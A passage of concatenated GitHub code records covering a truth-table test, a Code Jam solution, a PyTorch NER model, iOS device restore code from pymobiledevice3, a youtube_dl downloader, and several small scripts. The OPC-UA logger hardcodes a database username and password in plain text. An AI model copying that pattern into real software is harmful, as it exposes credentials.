PropositionalConstant(\"b\")\n negation_a = Negation(SimpleSentence(a_constant))\n vocab = PropositionalVocabulary([a_constant, b_constant])\n table = TruthTable(vocab, [negation_a])\n\n result = table.matrix\n\n self.assertEqual([\n [SimpleSentence(a_constant), True, True, False, False],\n [SimpleSentence(b_constant), True, False, True, False],\n [negation_a, False, False, True, True]\n ], result)","repo_name":"danielholmes/logic","sub_path":"tests/test_display.py","file_name":"test_display.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23395779001","text":"def square_root(num):\n\tx = num\n\ty = (x + num // x) // 2\n\twhile y < x:\n\t\tx = y\n\t\ty = (x + num // x) //2\n\treturn x\n\ndef is_fair_and_square(num):\n\treturn (str(num) == str(num)[::-1]) and (square_root(num)**2 == num) and (str(square_root(num)) == str(square_root(num))[::-1])\n\t\n\ndef find_fair_and_square(lower_bound, upper_bound):\n\ti = lower_bound\n\tfairs_and_squares = []\n\twhile i <= upper_bound:\n\t\tif is_fair_and_square(i):\n\t\t\tfairs_and_squares.append(i)\n\t\ti = i + 1\n\treturn len(fairs_and_squares)\n\nfrom sys import argv\nscript, input_file, output_file = argv\n\ninput_data = open(input_file)\noutput_data = open(output_file, 'w')\nnum_cases = int(input_data.readline())\ni = 0\n\nwhile i < num_cases:\n\tinput_line = input_data.readline().split()\n\tlower_bound = input_line[0]\n\tupper_bound = input_line[1]\n\tresult = find_fair_and_square(int(lower_bound), int(upper_bound))\n\toutput_data.write(\"Case #%s: %d\\n\" % (i + 1, result))\n\ti = i + 1\noutput_data.close()\n\t","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/2793.py","file_name":"2793.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5039633262","text":"# miner/modules/partial_ner.py\n\nimport logging\nfrom typing import Optional, Literal\n\nimport torch\nimport torch.nn as nn\nimport transformers\nfrom transformers import RobertaModel\n\nfrom miner.modules.partial_crf import PartialCRF\n\n\nclass PartialNER(nn.Module):\n \"\"\"Partial Named Entity Recognizer (NER) Model.\n\n This class defines a Partial NER model for named entity recognition tasks.\n It extends the PyTorch ``nn.Module`` class and integrates with the\n **Hugging Face** ``transformers`` library for handling pre-trained language\n models.\n\n Parameters\n ----------\n lm_path: str\n The path or identifier of a pre-trained language model checkpoint.\n num_labels: int\n The number of unique labels or tags for NER.\n device: str, {\"cpu\", \"cuda\"}\n The device on which the model will be instantiated (\"cpu\" or \"cuda\").\n dropout: float\n The dropout probability to apply to the model's hidden states.\n q: float, optional\n The q-value for the partial CRF layer. If None, no partial CRF is used.\n padding_idx : Optional[int], optional\n The padding index for the input sequences. If None, the default index\n is used.\n\n Attributes\n ----------\n device: str\n The device on which the model is instantiated.\n transformer: transformers.RobertaModel\n The pre-trained transformer model used for feature extraction.\n linear_dropout: nn.Dropout\n The dropout layer applied to the model's linear layer.\n fc: nn.Linear\n The linear layer mapping features to label scores.\n crf: PartialCRF\n The partial conditional random field layer for structured prediction.\n \"\"\"\n\n def __init__(\n self, lm_path: str, num_labels: int, device: Literal[\"cpu\", \"cuda\"],\n dropout: float, q: Optional[float]=None,\n padding_idx: Optional[int]=None\n ):\n super(PartialNER, self).__init__()\n self.device = device\n logging.info(f\"Loading LM checkpoint from {lm_path}\")\n self.transformer = RobertaModel.from_pretrained(lm_path)\n self.linear_dropout = nn.Dropout(dropout)\n self.fc = nn.Linear(768, num_labels) # (batch_size, max_length, num_labels)\n self.crf = PartialCRF(\n num_tags=num_labels,\n device=device,\n q=q,\n padding_idx=padding_idx\n )\n\n def forward(\n self, inputs: transformers.BatchEncoding,\n inputs_augmented: transformers.BatchEncoding,\n outputs: torch.LongTensor,\n loss_fn: Optional[Literal[\"nll\", \"c_nll\", \"gce\"]]=None\n ):\n \"\"\"Performs the forward pass.\n\n Parameters\n ----------\n inputs: transformer.BatchEncoding\n Original sentence, tokenized with ``transformers``.\n inputs_augmented: torch.BatchEncoding\n Language augmented input, tokenized with ``transformers``.\n outputs: torch.LongTensor\n List of true labels.\n loss_fn: str, {\"nll\", \"c_nll\", \"gce\"}, optional\n The desired loss function to use.\n\n Returns\n -------\n torch.FloatTensor\n Sum over the loss of the original input and the augmented input.\n \"\"\"\n h = self.transformer(**inputs).last_hidden_state\n logits = self.fc(self.linear_dropout(h))\n loss = self.crf(\n emissions=logits,\n tags=outputs,\n mask=inputs[\"attention_mask\"],\n loss_fn=\"nll\" if loss_fn is None else loss_fn\n )\n h_augmented = self.transformer(**inputs_augmented).last_hidden_state\n logits_augmented = self.fc(self.linear_dropout(h_augmented))\n loss_augmented = self.crf(\n emissions=logits_augmented,\n tags=outputs,\n mask=inputs_augmented[\"attention_mask\"],\n loss_fn=\"nll\" if loss_fn is None else loss_fn\n )\n return loss + loss_augmented\n\n @torch.inference_mode()\n def viterbi_decode(self, inputs: transformers.BatchEncoding):\n \"\"\"Computes the mostly likely label sequence.\n\n Parameters\n ----------\n inputs: transformers.BatchEncoding\n Input sentence tokenized with ``transformers``.\n\n Returns\n -------\n outputs: List[List[int]]\n Most likely tag sequence of each input in the batch.\n \"\"\"\n h = self.transformer(**inputs).last_hidden_state\n logits = self.fc(self.linear_dropout(h))\n outputs = self.crf.viterbi_decode(\n logits,\n mask=inputs[\"attention_mask\"]\n )\n return outputs\n\n @torch.inference_mode()\n def marginal_probabilities(self, inputs: transformers.BatchEncoding):\n \"\"\"Computes the marginal probability of each token of a given sequence\n to belong to a class.\n\n Parameters\n ----------\n inputs: transformers.BatchEncoding\n Input sentence tokenized with ``transformers``.\n\n Returns\n -------\n p: torch.FloatTensor\n Marginal probabilities. (batch_size, sequence_length, num_tags).\n\n \"\"\"\n h = self.transformer(**inputs).last_hidden_state\n logits = self.fc(self.linear_dropout(h))\n p = self.crf.marginal_probabilities(\n logits,\n mask=inputs[\"attention_mask\"]\n ).transpose(0, 1)\n return p\n\n","repo_name":"Madjakul/MiNER","sub_path":"miner/modules/partial_ner.py","file_name":"partial_ner.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30504286925","text":"n1=float(input('Enter First number: '))\r\nn2=float(input(\"Enter second Number: \"))\r\nopr=input(\"+,/,-,* Enter any one operator: \")\r\nif opr==\"+\":\r\n print(\"Addition: \",n1+n2)\r\nelif opr==\"-\":\r\n print(\"Subtraction: \",n1-n2)\r\nelif opr==\"*\":\r\n print(\"Multiplication: \",n1*n2)\r\nelif opr==\"/\":\r\n print(\"Division: \",n1/n2)\r\nelse:\r\n print(\"Invalid operator\")","repo_name":"anshuman2197/Python-Internshala","sub_path":"prob5.py","file_name":"prob5.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5895868208","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import filedialog, messagebox\n\nimport youtube_dl\n\n\ndef LocationFunc(location):\n down_Directory = filedialog.askdirectory(\n initialdir ='Home', title = 'Save video')\n location.set(down_Directory)\n\ndef DownloadFunc(linkVideo,location, my_hook):\n if linkVideo.get() != '':\n ydl_opts = {\n 'outtmpl':f'{location.get()}/%(title)s-%(id)s.%(ext)s',\n 'format': 'bestvideo[ext=mp4]+bestaudio[ext=mp4]/best',\n 'progress_hooks': [my_hook],\n }\n\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n try:\n ydl.download([linkVideo.get()])\n except:\n messagebox.showinfo(\"Error\", \"Link video invalid\")\n \n else:\n messagebox.showinfo(\"Error\", \"Link video should not be EMPTY\")\n\n\n\n","repo_name":"matchamochiiiii/appdown","sub_path":"logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17923909997","text":"import hashlib\nimport logging\nimport time\nimport typing\nfrom zipfile import ZipFile\n\nfrom usb import USBError\n\nfrom pymobiledevice3.exceptions import PyMobileDevice3Exception\nfrom pymobiledevice3.irecv import IRecv, Mode\nfrom pymobiledevice3.lockdown import create_using_usbmux\nfrom pymobiledevice3.restore.base_restore import BaseRestore, Behavior\nfrom pymobiledevice3.restore.consts import lpol_file\nfrom pymobiledevice3.restore.device import Device\nfrom pymobiledevice3.restore.tss import TSSRequest\n\nRESTORE_VARIANT_ERASE_INSTALL = 'Erase Install (IPSW)'\nRESTORE_VARIANT_UPGRADE_INSTALL = 'Upgrade Install (IPSW)'\nRESTORE_VARIANT_MACOS_RECOVERY_OS = 'macOS Customer'\n\n\nclass Recovery(BaseRestore):\n def __init__(self, ipsw: ZipFile, device: Device, tss: typing.Mapping = None, behavior: Behavior = Behavior.Update):\n super().__init__(ipsw, device, tss, behavior, logger=logging.getLogger(__name__))\n self.tss_localpolicy = None\n self.tss_recoveryos_root_ticket = None\n self.restore_boot_args = None\n\n def reconnect_irecv(self, is_recovery=None):\n self.logger.debug('waiting for device to reconnect...')\n self.device.irecv = IRecv(ecid=self.device.ecid, is_recovery=is_recovery)\n self.logger.debug(f'connected mode: {self.device.irecv.mode}')\n\n def get_preboard_manifest(self):\n overrides = {\n '@APTicket': True,\n 'ApProductionMode': 0,\n 'ApSecurityDomain': 0,\n }\n\n parameters = {\n 'ApProductionMode': False,\n 'ApSecurityMode': False,\n 'ApSupportsImg4': True,\n }\n\n self.build_identity.populate_tss_request_parameters(parameters)\n\n tss = TSSRequest()\n tss.add_common_tags(parameters, overrides)\n\n parameters['_OnlyFWComponents'] = True\n\n tss.add_ap_tags(parameters)\n\n return tss.img4_create_local_manifest(build_identity=self.build_identity)\n\n def get_tss_response(self):\n # populate parameters\n parameters = dict()\n\n parameters['ApECID'] = self.device.ecid\n if self.device.ap_nonce is not None:\n parameters['ApNonce'] = self.device.ap_nonce\n\n if self.device.sep_nonce is not None:\n parameters['ApSepNonce'] = self.device.sep_nonce\n\n parameters['ApProductionMode'] = True\n\n if self.device.is_image4_supported:\n parameters['ApSecurityMode'] = True\n parameters['ApSupportsImg4'] = True\n else:\n parameters['ApSupportsImg4'] = False\n\n self.build_identity.populate_tss_request_parameters(parameters)\n\n tss = TSSRequest()\n tss.add_common_tags(parameters)\n tss.add_ap_tags(parameters)\n\n # add personalized parameters\n if self.device.is_image4_supported:\n tss.add_ap_img4_tags(parameters)\n else:\n tss.add_ap_img3_tags(parameters)\n\n # normal mode; request baseband ticket as well\n if self.device.lockdown is not None:\n pinfo = self.device.preflight_info\n if pinfo:\n self.logger.debug('adding preflight info')\n\n node = pinfo.get('Nonce')\n if node is not None:\n parameters['BbNonce'] = node\n\n node = pinfo.get('ChipID')\n if node is not None:\n parameters['BbChipID'] = node\n\n node = pinfo.get('CertID')\n if node is not None:\n parameters['BbGoldCertId'] = node\n\n node = pinfo.get('ChipSerialNo')\n if node is not None:\n parameters['BbSNUM'] = node\n\n tss.add_baseband_tags(parameters)\n\n euiccchipid = pinfo.get('EUICCChipID')\n if euiccchipid:\n self.logger.debug('adding EUICCChipID info')\n parameters['eUICC,ChipID'] = euiccchipid\n\n if euiccchipid >= 5:\n node = pinfo.get('EUICCCSN')\n if node is not None:\n parameters['eUICC,EID'] = node\n\n node = pinfo.get('EUICCCertIdentifier')\n if node is not None:\n parameters['eUICC,RootKeyIdentifier'] = node\n\n node = pinfo.get('EUICCGoldNonce')\n if node is not None:\n parameters['EUICCGoldNonce'] = node\n\n node = pinfo.get('EUICCMainNonce')\n if node is not None:\n parameters['EUICCMainNonce'] = node\n\n tss.add_vinyl_tags(parameters)\n\n # send request and grab response\n return tss.send_receive()\n\n def get_local_policy_tss_response(self):\n # populate parameters\n parameters = {\n 'ApECID': self.device.ecid,\n 'Ap,LocalBoot': False,\n 'ApProductionMode': True,\n }\n\n if self.device.ap_nonce:\n parameters['ApNonce'] = self.device.ap_nonce\n\n sep_nonce = self.device.sep_nonce\n\n if sep_nonce:\n parameters['ApSepNonce'] = sep_nonce\n\n if self.device.is_image4_supported:\n parameters['ApSecurityMode'] = True\n parameters['ApSupportsImg4'] = True\n else:\n parameters['ApSupportsImg4'] = False\n\n self.build_identity.populate_tss_request_parameters(parameters)\n\n # Add Ap,LocalPolicy\n lpol = {\n 'Digest': hashlib.sha384(lpol_file).digest(),\n 'Trusted': True,\n }\n\n parameters['Ap,LocalPolicy'] = lpol\n\n # Add Ap,NextStageIM4MHash\n # Get previous TSS ticket\n ticket = self.tss.ap_img4_ticket\n # Hash it and add it as Ap,NextStageIM4MHash\n parameters['Ap,NextStageIM4MHash'] = hashlib.sha384(ticket).digest()\n\n # create basic request\n request = TSSRequest()\n\n # add common tags from manifest\n request.add_local_policy_tags(parameters)\n\n return request.send_receive()\n\n def get_recoveryos_root_ticket_tss_response(self):\n # populate parameters\n parameters = {\n 'ApECID': self.device.ecid,\n 'Ap,LocalBoot': False,\n 'ApProductionMode': True,\n }\n\n if self.device.ap_nonce:\n parameters['ApNonce'] = self.device.ap_nonce\n\n sep_nonce = self.device.sep_nonce\n\n if sep_nonce:\n parameters['ApSepNonce'] = sep_nonce\n\n if self.device.is_image4_supported:\n parameters['ApSecurityMode'] = True\n parameters['ApSupportsImg4'] = True\n else:\n parameters['ApSupportsImg4'] = False\n\n self.build_identity.populate_tss_request_parameters(parameters)\n\n # create basic request\n # Adds @HostPlatformInfo, @VersionInfo, @UUID\n request = TSSRequest()\n\n # add common tags from manifest\n # Adds Ap,OSLongVersion, AppNonce, @ApImg4Ticket\n request.add_ap_img4_tags(parameters)\n\n # add AP tags from manifest\n request.add_common_tags(parameters)\n\n # add AP tags from manifest\n # Fills digests & co\n request.add_ap_recovery_tags(parameters)\n\n return request.send_receive()\n\n def fetch_tss_record(self):\n if self.ipsw.build_manifest.build_major > 8:\n if self.device.ap_nonce is None:\n # the first nonce request with older firmware releases can fail, and it's OK\n self.logger.info('NOTE: Unable to get nonce from device')\n\n self.tss = self.get_tss_response()\n\n if self.macos_variant:\n self.tss_localpolicy = self.get_local_policy_tss_response()\n self.tss_recoveryos_root_ticket = self.get_recoveryos_root_ticket_tss_response()\n\n return self.tss\n\n def send_component(self, name: str):\n # Use a specific TSS ticket for the Ap,LocalPolicy component\n data = None\n tss = self.tss\n if name == 'Ap,LocalPolicy':\n tss = self.tss_localpolicy\n # If Ap,LocalPolicy => Inject an empty policy\n data = lpol_file\n\n data = self.build_identity.get_component(name, tss=tss, data=data).personalized_data\n self.logger.info(f'Sending {name} ({len(data)} bytes)...')\n self.device.irecv.send_buffer(data)\n\n def send_component_and_command(self, name, command):\n self.send_component(name)\n self.device.irecv.send_command(command)\n\n def send_ibec(self):\n component = 'iBEC'\n self.send_component(component)\n self.device.irecv.send_command('go', b_request=1)\n self.device.irecv.ctrl_transfer(0x21, 1)\n\n def send_applelogo(self, allow_missing=True):\n component = 'RestoreLogo'\n\n if not self.build_identity.has_component(component):\n if allow_missing:\n logging.warning(f'build_identity has no {component}')\n return\n else:\n raise PyMobileDevice3Exception(f'missing component: {component}')\n\n self.send_component(component)\n self.device.irecv.send_command('setpicture 4')\n self.device.irecv.send_command('bgcolor 0 0 0')\n\n def send_loaded_by_iboot(self):\n manifest = self.build_identity['Manifest']\n for key, node in manifest.items():\n iboot = node['Info'].get('IsLoadedByiBoot', False)\n iboot_stg1 = node['Info'].get('IsLoadedByiBootStage1', False)\n\n assert isinstance(iboot, bool)\n assert isinstance(iboot_stg1, bool)\n\n if iboot and not iboot_stg1:\n self.logger.debug(f'{key} is loaded by iBoot')\n self.send_component_and_command(key, 'firmware')\n\n def send_iboot_stage1_components(self):\n manifest = self.build_identity['Manifest']\n for key, node in manifest.items():\n iboot = node['Info'].get('IsLoadedByiBoot', False)\n iboot_stg1 = node['Info'].get('IsLoadedByiBootStage1', False)\n\n assert isinstance(iboot, bool)\n assert isinstance(iboot_stg1, bool)\n\n if iboot and iboot_stg1:\n self.logger.debug(f'{key} is loaded by iBoot Stage 1')\n self.send_component_and_command(key, 'firmware')\n\n def send_ramdisk(self):\n component = 'RestoreRamDisk'\n ramdisk_size = self.device.irecv.getenv('ramdisk-size')\n self.logger.info(f'ramdisk-size: {ramdisk_size}')\n\n self.send_component(component)\n ramdisk_delay = self.device.irecv.getenv('ramdisk-delay')\n self.logger.info(f'ramdisk-delay: {ramdisk_delay}')\n\n self.device.irecv.send_command('ramdisk')\n\n time.sleep(2)\n\n def send_kernelcache(self):\n component = 'RestoreKernelCache'\n\n self.send_component(component)\n try:\n self.device.irecv.ctrl_transfer(0x21, 1)\n except USBError:\n pass\n\n if self.restore_boot_args:\n self.device.irecv.send_command(f'setenv boot-args {self.restore_boot_args}')\n\n try:\n self.device.irecv.send_command('bootx', b_request=1)\n except USBError:\n pass\n\n def set_autoboot(self, enable: bool):\n self.device.irecv.set_autoboot(enable)\n\n def enter_restore(self):\n if self.ipsw.build_manifest.build_major >= 8:\n self.restore_boot_args = 'rd=md0 nand-enable-reformat=1 -progress'\n elif self.macos_variant:\n self.restore_boot_args = 'rd=md0 nand-enable-reformat=1 -progress -restore'\n\n # upload data to make device boot restore mode\n\n # Recovery Mode Environment:\n build_version = None\n while not build_version:\n self.logger.debug('build-version not yet supported. reconnecting...')\n time.sleep(1)\n\n # sometimes we manage to connect before iBEC actually started running\n build_version = self.device.irecv.getenv('build-version')\n self.reconnect_irecv()\n\n self.logger.info(f'iBoot build-version={build_version}')\n\n build_style = self.device.irecv.getenv('build-style')\n self.logger.info(f'iBoot build-style={build_style}')\n\n radio_error = self.device.irecv.getenv('radio-error')\n if radio_error:\n radio_error = int(radio_error)\n self.logger.info(f'radio-error: {radio_error}')\n radio_error_string = self.device.irecv.getenv('radio-error-string')\n if radio_error_string:\n self.logger.info(f'radio-error-string: {radio_error_string}')\n\n self.set_autoboot(False)\n\n # send logo and show it\n self.send_applelogo()\n\n # send components loaded by iBoot\n self.send_loaded_by_iboot()\n\n # send ramdisk and run it\n self.send_ramdisk()\n\n # send devicetree and load it\n self.send_component_and_command('RestoreDeviceTree', 'devicetree')\n\n if self.build_identity.has_component('RestoreSEP'):\n # attempt to send rsepfirmware and load it, otherwise continue\n try:\n self.send_component_and_command('RestoreSEP', 'rsepfirmware')\n except USBError:\n pass\n\n self.send_kernelcache()\n\n def dfu_enter_recovery(self):\n self.send_component('iBSS')\n self.reconnect_irecv()\n\n if 'SRTG' in self.device.irecv._device_info:\n raise PyMobileDevice3Exception('Device failed to enter recovery')\n\n if self.build_identity.build_manifest.build_major > 8:\n old_nonce = self.device.irecv.ap_nonce\n\n # reconnect\n self.reconnect_irecv()\n nonce = self.device.irecv.ap_nonce\n\n if old_nonce != nonce:\n # Welcome iOS5. We have to re-request the TSS with our nonce.\n self.tss = self.get_tss_response()\n\n self.device.irecv.set_configuration(1)\n\n # Now, before sending iBEC, we must send necessary firmwares on new versions.\n if self.macos_variant:\n # Without this empty policy file & its special signature, iBEC won't start.\n self.send_component_and_command('Ap,LocalPolicy', 'lpolrestore')\n self.send_iboot_stage1_components()\n self.device.irecv.set_autoboot(False)\n self.device.irecv.send_command('setenvnp boot-args rd=md0 nand-enable-reformat=1 -progress -restore')\n self.send_applelogo(allow_missing=False)\n\n mode = self.device.irecv.mode\n # send iBEC\n self.send_component('iBEC')\n\n if self.device.irecv and mode.is_recovery:\n time.sleep(1)\n self.device.irecv.send_command('go', b_request=1)\n\n if self.build_identity.build_manifest.build_major < 20:\n try:\n self.device.irecv.ctrl_transfer(0x21, 1, timeout=5000)\n except USBError:\n pass\n\n self.logger.debug('Waiting for device to disconnect...')\n time.sleep(10)\n\n self.logger.debug('Waiting for device to reconnect in recovery mode...')\n self.reconnect_irecv(is_recovery=True)\n\n def boot_ramdisk(self):\n if self.tss is None:\n self.logger.info('fetching TSS record')\n self.fetch_tss_record()\n\n if self.device.lockdown:\n # normal mode\n self.logger.info('going into Recovery')\n\n # in case lockdown has disconnected while waiting for a ticket\n self.device.lockdown = create_using_usbmux(serial=self.device.lockdown.udid, connection_type='USB')\n self.device.lockdown.enter_recovery()\n\n self.device.lockdown = None\n self.device.irecv = IRecv(self.device.ecid)\n self.reconnect_irecv()\n\n if self.device.irecv.mode == Mode.DFU_MODE:\n # device is currently in DFU mode, place it into recovery mode\n self.dfu_enter_recovery()\n\n elif self.device.irecv.mode.is_recovery:\n # now we load the iBEC\n try:\n self.send_ibec()\n except USBError:\n pass\n\n self.reconnect_irecv(is_recovery=True)\n\n self.logger.info('device booted into recovery')\n\n # now finally do the magic to put the device into restore mode\n self.enter_restore()\n","repo_name":"doronz88/pymobiledevice3","sub_path":"pymobiledevice3/restore/recovery.py","file_name":"recovery.py","file_ext":"py","file_size_in_byte":16475,"program_lang":"python","lang":"en","doc_type":"code","stars":600,"dataset":"github-code","pt":"61"} +{"seq_id":"24806646284","text":"# station 3\r\nfrom opcua import Client\r\nimport time\r\nimport pymysql\r\nimport datetime\r\n\r\ncounter = 0\r\nruntime= 0\r\n\r\n\r\nurl = \"opc.tcp://192.168.0.30:4840\"\r\nclient = Client(url)\r\n\r\nwhile True:\r\n\r\n mydb = pymysql.connect(\r\n host=\"192.168.0.206\",\r\n user=\"Emmanuel_Sim\",\r\n password= \"1221\",\r\n database = \"14octtraining\"\r\n )\r\n cursor = mydb.cursor()\r\n\r\n client.connect()\r\n\r\n status = client.get_node('ns=2;s=Application.GVL_FTS.bFTS_Track0_Sending_gb') \r\n mstatus = status.get_value()\r\n\r\n drivestate = client.get_node('ns=2;s=Application.GVL_VR2109.uiDrive_State') \r\n dstatevalue = drivestate.get_value()\r\n\r\n ftsstate = client.get_node('ns=2;s=Application.GVL_VR2109.uiFTS_Track0_State')\r\n ftsvalue = ftsstate.get_value()\r\n\r\n actualOutput = \"INSERT INTO `actualOutput` (`PID`, `actualOutput`, `time_stamp`) VALUES (%s, %s, %s)\"\r\n runTime = \"INSERT INTO `runTime` (`PID`, `runTime`, `time_stamp`) VALUES (%s, %s, %s)\"\r\n\r\n if mstatus == True:\r\n ts = time.time()\r\n timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\r\n counter += 1\r\n cursor.execute(actualOutput, ('', counter/2, timestamp))\r\n print('Output Count:', counter/2)\r\n\r\n if dstatevalue == 2 and ftsvalue == 2:\r\n runtime += 1\r\n ts = time.time()\r\n timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\r\n cursor.execute(runTime, ('', runtime, timestamp))\r\n print('Run time:', runtime, 's')\r\n\r\n mydb.commit()\r\n mydb.close()\r\n\r\n client.disconnect()\r\n time.sleep(1)\r\n\r\n client.session_timeout = 10000\r\n","repo_name":"emsiru/OEE_Uploads","sub_path":"OEE_Values.py","file_name":"OEE_Values.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73591221634","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\nimport os\n#from webapp2_extras.i18n import lazy_gettext as _\n\nfrom forms import ContactForm\nfrom models import Contact\nfrom .base import BaseHandler\nfrom .mails import send_contact_mail\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass HelloHandler(BaseHandler):\n def get(self):\n self.response.write(self.app.config)\n self.response.write(self.request)\n\n\nclass HomeHandler(BaseHandler):\n def get(self, locale=None):\n self.set_locale(locale)\n if self.locale == 'zh_TW':\n file_location = os.path.join(\n self.app.config.get('PROJECT_ROOT'),\n \"templates/portfolio_zh_TW.json\",\n )\n elif self.locale == 'zh_CN':\n file_location = os.path.join(\n self.app.config.get('PROJECT_ROOT'),\n \"templates/portfolio_zh_CN.json\",\n )\n else:\n file_location = os.path.join(\n self.app.config.get('PROJECT_ROOT'),\n \"templates/portfolio.json\",\n )\n f = open(file_location, 'rb')\n self.render_response(\n 'index.html', cache_time=self.app.config.get('cache'),\n clients=json.load(f),\n locale=self.locale,\n locales=self.app.config.get('locales'),\n )\n\n\nclass StarterHandler(BaseHandler):\n def get(self):\n self.render_response('starter.html')\n\n\nclass SigninHandler(BaseHandler):\n def get(self):\n self.render_response('signin.html')\n\n\nclass ContactHandler(BaseHandler):\n def get(self):\n params = {\n 'form': ContactForm(self),\n }\n self.render_response('contact.html', **params)\n\n def post(self):\n form = ContactForm(self)\n params = {\n 'form': form,\n }\n self.response.write(form.validate())\n if form.validate():\n contact = Contact(\n name=self.request.get('name'),\n email=self.request.get('email'),\n subject=self.request.get('subject'),\n body=self.request.get('body'),\n )\n contact.put()\n send_contact_mail(self)\n else:\n self.render_response('contact.html', **params)\n","repo_name":"7kfpun/com.getmewrite","sub_path":"handlers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7210546653","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as nu\nimport pandas as pd\nfrom geopy.geocoders import Nominatim\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# In[2]:\n\n\ndata=pd.read_csv(\"E:/Python & R Project/new project/assignment_data.csv\")\ndata\n\n\n# In[3]:\n\n\ndata.head()\n\n\n# In[4]:\n\n\ndata.columns\n\n\n# In[5]:\n\n\ndata.info()\n\n\n# In[6]:\n\n\ndata.describe()\n\n\n# In[7]:\n\n\ndata.isnull().sum()\n\n\n# In[8]:\n\n\ndata.corr()\n\n\n# In[9]:\n\n\nplt.figure(figsize=(14,8))\nsns.heatmap(data.corr(),cmap='Spectral', annot = True)\n\n\n# In[10]:\n\n\ndata.columns\n\n\n# In[11]:\n\n\nsns.pairplot(data,diag_kind='kde');\n\n\n# In[12]:\n\n\nfrom collections import Counter\n\n\n# In[13]:\n\n\nduplicate=data.duplicated()\nprint(duplicate)\n\n\n# In[14]:\n\n\ndata1 = pd.DataFrame([duplicate])\nprint (data1)\n\n\n# In[15]:\n\n\ndata1.describe()\n\n\n# In[28]:\n\n\ndesc = data[\"name\"].describe()\ndesc\n\n","repo_name":"AkshayBDeshmukh/Asssignment","sub_path":"Assignment.py","file_name":"Assignment.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11351650953","text":"class Estadisticas:\n archivoSalida = \"\"\n listaClasificados = []\n cantidadPatrones = 0\n listaComparacion = []\n archivoComparacion = \"\"\n precision = 0\n accuracy = 0\n recall = 0\n tp,fp,tn,fn = 0,0,0,0\n\n def __init__(self,archivoSalida,listaClasificados,archivoComparacion):\n self.archivoSalida = archivoSalida\n self.listaClasificados = listaClasificados\n self.archivoComparacion = archivoComparacion\n\n def leerArchivoComparacion(self):\n archivo = open(self.archivoComparacion,\"r\")\n for linea in archivo:\n patron = linea.split(\",\")\n patron = [round(float(rasgo),1) for rasgo in patron]\n self.listaComparacion.append(patron)\n archivo.close()\n self.cantidadPatrones = len(self.listaComparacion)\n\n def generarMatrizConfusion(self, clasificador):\n if clasificador == 3:\n index = 2\n else: index = 4\n for patron in range(0,len(self.listaClasificados)):\n print(str(self.listaClasificados[patron]) + \" \" + str(self.listaComparacion[patron]))\n if self.listaClasificados[patron][index] == 1 and self.listaComparacion[patron][4] == 1:\n self.tp += 1\n elif self.listaClasificados[patron][index] == 1 and self.listaComparacion[patron][4] == 2:\n self.fp += 1\n elif self.listaClasificados[patron][index] == 2 and self.listaComparacion[patron][4] == 1:\n self.fn += 1\n else:\n self.tn += 1\n print(\"TP \" + str(self.tp) + \"\\tFP \" + str(self.fp) + \"\\nFN \" + str(self.fn) + \"\\tTN \" + str(self.tn))\n self.precision = self.tp / (self.tp + self.fp)\n self.recall = self.tp / (self.tp + self.fn)\n self.accuracy = (self.tp + self.tn) / (self.tp + self.tn + self.fp + self.fn)\n print(\"Precision \" + str(self.precision) + \" recall \" + str(self.recall) + \" accuracy \" + str(self.accuracy))\n","repo_name":"carlos-ochoa/Pattern_Recognition","sub_path":"Estadisticas.py","file_name":"Estadisticas.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27521910764","text":"\ndef inRange(val, caster, minimum, maximum):\n try:\n castedVal = caster(val)\n if minimum < castedVal < maximum:\n return True\n except:\n return False\n\n\ndef neighbourhoodValidator(val, caster):\n try:\n neighbourhoods = caster(val)\n\n if neighbourhoods[0] == 4 or neighbourhoods[0] == 8:\n if neighbourhoods[1] == 4 or neighbourhoods[1] == 8:\n return True\n except:\n return False\n\n\ndef thresholdValidator(val, caster):\n return inRange(val, caster, 0, 255)\n\n\ndef resizeValidator(val, caster):\n return inRange(val, caster, 0, float('inf'))\n\n\ndef strElementValidator(val, caster):\n try:\n width = caster(val)\n if width > 0 and width % 2 == 1:\n return True\n except:\n return False","repo_name":"ondra-vaic/Skeletonization","sub_path":"ZVI/src/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11757477739","text":"from models import *\r\nfrom preprocess import *\r\n# from torch.utils.tensorboard import SummaryWriter\r\nfrom torchvision.utils import make_grid\r\nfrom torch.utils.data import DataLoader\r\nfrom torchvision import transforms\r\nfrom tqdm import tqdm\r\nimport torch.optim as optim\r\nfrom matplotlib import pyplot as plt\r\n\r\nBATCH_SIZE = 64\r\n\r\nimage_transform = transforms.Compose([transforms.ToTensor()])\r\ntrain_data = 